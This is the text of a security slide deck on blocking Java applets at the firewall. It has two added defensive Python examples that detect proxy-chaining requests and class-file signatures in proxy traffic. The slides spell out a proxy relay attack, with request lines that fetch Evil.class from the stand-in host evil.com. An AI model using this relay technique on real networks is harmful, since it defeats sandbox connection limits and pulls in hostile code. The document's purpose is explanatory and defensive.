Blocking Java Applets at the Firewall

Blocking Java Applets at the Firewall

D. Martin, S. Rajagopalan, Bellcore
A. Rubin, AT&T Research


Why should applets be blocked?

■ Insider attacks are the worst.
■ The ubiquity of Java-enabled browsers effectively transforms outsider attacks into insider attacks.
  – “But isn’t this mitigated by the security restrictions imposed on applets?”


Yes, but...

■ Sometimes the security mechanisms themselves can be broken, penetrating the restrictions of the sandbox. [Princeton attacks]
■ And the mechanisms don’t prevent an applet from enlisting the firewall’s help in violating the security policy.


Example policy & mechanism

Policy: Applets are only permitted to open “safe” TCP connections.
Mechanism: The SecurityManager only allows outgoing TCP connections to the server that delivered the applet.

This isn’t enough!


1: ClassLoader starts obtaining Evil.class
[Diagram: ClassLoader, fido.xxx.com, proxy.xxx.com. ClassLoader: “Ok, applet lives on fido.xxx.com”]


2. Netscape routes request through proxy.xxx.com
[Diagram: ClassLoader, fido.xxx.com, proxy.xxx.com. ClassLoader: “Fetching applet from fido.xxx.com (via proxy.xxx.com)”]
GET http://fido.xxx.com/http://evil.com/Evil.class HTTP/1.0


3. Proxy.xxx.com contacts itself as fido.xxx.com
[Diagram: ClassLoader, fido.xxx.com, proxy.xxx.com. ClassLoader: “Still fetching applet from fido.xxx.com (via proxy.xxx.com)”]
GET http://evil.com/Evil.class HTTP/1.0


4. Fido.xxx.com fetches Evil.class from evil.com and delivers it to proxy.xxx.com and the ClassLoader
[Diagram: victim, fido.xxx.com, proxy.xxx.com, evil.com. ClassLoader: “Now receiving applet from fido.xxx.com (via proxy.xxx.com)”]
0x CA FE BA BE 00 03 ...


A Bump in the Net

■ The applet came from fido.xxx.com, so it may “only” open TCP connections to fido.xxx.com.
■ Fido.xxx.com is a proxy server designed to forward TCP streams to arbitrary destinations.
■ This violates the security policy.
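The relay pattern in the four slides above leaves a visible trace: the request to the applet's own host (fido.xxx.com) carries a second absolute URL in its path, and that host then forwards the stream elsewhere. The following is an added example, not code from the slides or their authors, of a proxy-log check that flags such request lines. It assumes the log records full HTTP/1.0 request lines in the absolute-URL form shown on the slides; the host names, the set of "internal" hosts and the log lines are constructed for illustration.

```python
"""Flag proxy request lines whose path embeds a second absolute URL.

Added example (not from the Martin/Rajagopalan/Rubin slides). Host names,
the internal-host set and the sample log are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

# Request-line grammar as shown on the slides: METHOD absolute-URL HTTP/x.y
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+HTTP/\d\.\d$")
# A second scheme://host inside the path is the tell-tale of proxy chaining.
NESTED_URL = re.compile(r"/(https?|ftp)://", re.IGNORECASE)


def nested_target(request_line: str):
    """Return (outer_host, inner_host) if the path embeds another URL, else None."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return None
    outer = urlsplit(m.group("url"))
    hit = NESTED_URL.search(outer.path)
    if not hit:
        return None
    inner = urlsplit(outer.path[hit.start() + 1:])
    return outer.hostname, inner.hostname


def is_proxy_chaining(request_line: str, internal_hosts: set) -> bool:
    """True when an internal host is being asked to fetch from a host outside the set.

    That is the policy violation the slides describe: the applet's origin
    host becomes a relay to an arbitrary destination.
    """
    pair = nested_target(request_line)
    if pair is None:
        return False
    outer, inner = pair
    return outer in internal_hosts and inner not in internal_hosts


def scan_log(lines, internal_hosts):
    """Return the request lines that should be blocked or alerted on."""
    return [ln for ln in lines if is_proxy_chaining(ln, internal_hosts)]


# Constructed sample log, modelled on the request lines in the slides.
SAMPLE_LOG = [
    "GET http://fido.xxx.com/index.html HTTP/1.0",
    "GET http://fido.xxx.com/http://evil.com/Evil.class HTTP/1.0",
    "GET http://fido.xxx.com/http://fido.xxx.com/Ok.class HTTP/1.0",
    "GET http://www.example.net/ HTTP/1.0",
]
INTERNAL = {"fido.xxx.com", "proxy.xxx.com"}  # constructed

if __name__ == "__main__":
    for ln in scan_log(SAMPLE_LOG, INTERNAL):
        print("BLOCK:", ln)
```

Only the second sample line is flagged: the first and fourth carry no nested URL, and the third asks fido.xxx.com to fetch from itself, which stays inside the internal set. The check is deliberately narrow; it catches the URL-in-path relay form the slides show and nothing else, so it belongs beside the class-file checks on the later slide rather than in place of them.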


How to block applets at the firewall

■ Remove <applet> tags from HTML
  – Extremely difficult to get right.
  – Only possible strategy for JavaScript & ActiveX.
■ Detect Java class file signature 0xCA FE BA BE
  – Even this can be disguised.
■ It’s not easy, and it’s getting harder.
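The second bullet above is the one a filtering proxy can act on mechanically. The following is an added example, not code from the slides or their authors, of a response check built on the class-file magic the slide names (0xCAFEBABE followed by the minor and major version, as in the "CA FE BA BE 00 03" bytes shown on slide 4). It goes beyond the slide in one respect, to illustrate the "even this can be disguised" caveat: a check on the first four bytes of the raw body misses a class file that arrives gzip-encoded or packed in a JAR, so the example decodes the Content-Encoding and looks inside ZIP archives before deciding. The header dictionary shape, the fail-closed choice on undecodable bodies, and all sample bodies are assumptions constructed for this example.

```python
"""Detect Java class files in HTTP response bodies at a filtering proxy.

Added example, not from the slides: checks the class-file magic and also
looks through gzip encoding and JAR/ZIP archives, two wrappings that hide
the signature from a naive first-four-bytes check. Samples are constructed.
"""
import gzip
import io
import struct
import zipfile

CLASS_MAGIC = b"\xca\xfe\xba\xbe"


def is_class_file(data: bytes) -> bool:
    """A Java class file starts with the magic, then minor and major version."""
    if len(data) < 8 or data[:4] != CLASS_MAGIC:
        return False
    minor, major = struct.unpack(">HH", data[4:8])
    # Major version 45 is JDK 1.0/1.1; anything lower is not a real class file.
    return major >= 45


def contains_class_file(data: bytes) -> bool:
    """True if data is a class file or a ZIP/JAR with one inside."""
    if is_class_file(data):
        return True
    if data[:2] == b"PK":  # ZIP local-file / end-of-central-directory signature prefix
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as jar:
                for name in jar.namelist():
                    if is_class_file(jar.read(name)[:8]):
                        return True
        except zipfile.BadZipFile:
            pass
    return False


def should_block(headers: dict, body: bytes) -> bool:
    """Decide at the proxy whether to drop this response.

    headers maps lower-cased header names to values (assumed shape). The body
    is decoded first, because a gzip-encoded class file does not start with
    the magic. A body that claims gzip but cannot be decoded is blocked
    (fail closed), since it cannot be inspected.
    """
    encoding = headers.get("content-encoding", "").lower()
    if encoding == "gzip":
        try:
            body = gzip.decompress(body)
        except (OSError, EOFError):
            return True
    return contains_class_file(body)


# Constructed samples: a minimal class-file header (magic, minor 3, major 45),
# an HTML page, and helpers to wrap the header in gzip and in a JAR.
CLASS_HEADER = CLASS_MAGIC + struct.pack(">HH", 3, 45) + b"\x00" * 8
HTML_PAGE = b"<html><body>hello</body></html>"


def make_jar(entries: dict) -> bytes:
    """Build an in-memory ZIP/JAR from {name: bytes} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    print("raw class  :", should_block({}, CLASS_HEADER))
    print("gzip class :", should_block({"content-encoding": "gzip"}, gzip.compress(CLASS_HEADER)))
    print("jar class  :", should_block({}, make_jar({"Evil.class": CLASS_HEADER})))
    print("html       :", should_block({}, HTML_PAGE))
```

The example is still only a signature check, which is the slide's point: it recognises class files by their header, so any delivery that keeps the header out of the inspected bytes defeats it. That is why the slide's last bullet, and the conclusions that follow, push the general fix to the workstation rather than the firewall.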


Conclusions

■ Applets can be a threat even when the Java security system is working.
■ Firewalls can no longer trust insiders just because they’re inside.
  – Authenticate insiders.
■ Blocking applets at the firewall is hard.
■ General solutions involve changes at the workstation level, not just the firewall.
